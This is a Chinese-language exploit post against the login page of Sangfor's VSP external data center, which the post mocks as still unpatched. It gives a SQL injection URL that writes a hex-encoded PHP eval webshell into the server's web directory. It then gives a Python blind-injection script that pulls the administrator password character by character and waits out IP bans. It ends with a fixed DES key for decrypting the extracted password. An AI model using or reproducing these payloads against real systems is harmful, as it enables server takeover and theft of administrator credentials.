深信服VSP外置数据中心getshell

和SSL VPN的外置数据中心漏洞一模一样，过了半年不修复还挂在官网上？？
一、getshell：

https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'D://Program Files//Sangfor//SSL//LogKeeper//htdocs//test.php'

二、注入获取管理员密码

关门，上python

# encoding:utf-8 import requests import sys import time if len(sys.argv)<2 :  print "useage: test.py target/r"  print "example: python test.py https://192.168.222.128/"  sys.exit(0) target = sys.argv[1] def exploit(url,pointer) :  password = ""  list = ["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9"]  while pointer < 17 :   flag = False   index = 0   while (index < len(list)) :    sql = "and (select mid(sys_adt_pass,%d,1) from sys_adt where id=1)=/"%s/"" % (pointer+1,list[index])    response = requests.get(url+"src/login.php?action_c=login&user_type=1&user=admin&pass=&nodeid=1 "+sql,timeout=10,verify=False)    if "拒绝登录" in response.content : #IP被封锁时，延迟305秒     print "login failure exceeded 5 times,ip is banned,wait for 305 seconds to continue"     time.sleep(305)    elif "用户名或者密码不正确" in response.content :     print "password[%d]=%s" % (pointer,list[index])     password += list[index]     break    elif "连接数据库失败" in response.content :     index += 1    else :     print "error,exit!"     sys.exit(0)        pointer += 1  print("Admin's password is %s") % (password) exploit(target,0) print "done!"

运行效果：

打开这个网站去解密http://des.online-domain-tools.com/
去掉密码最后一位，key为tjf，点击decrypt就能得到明文密码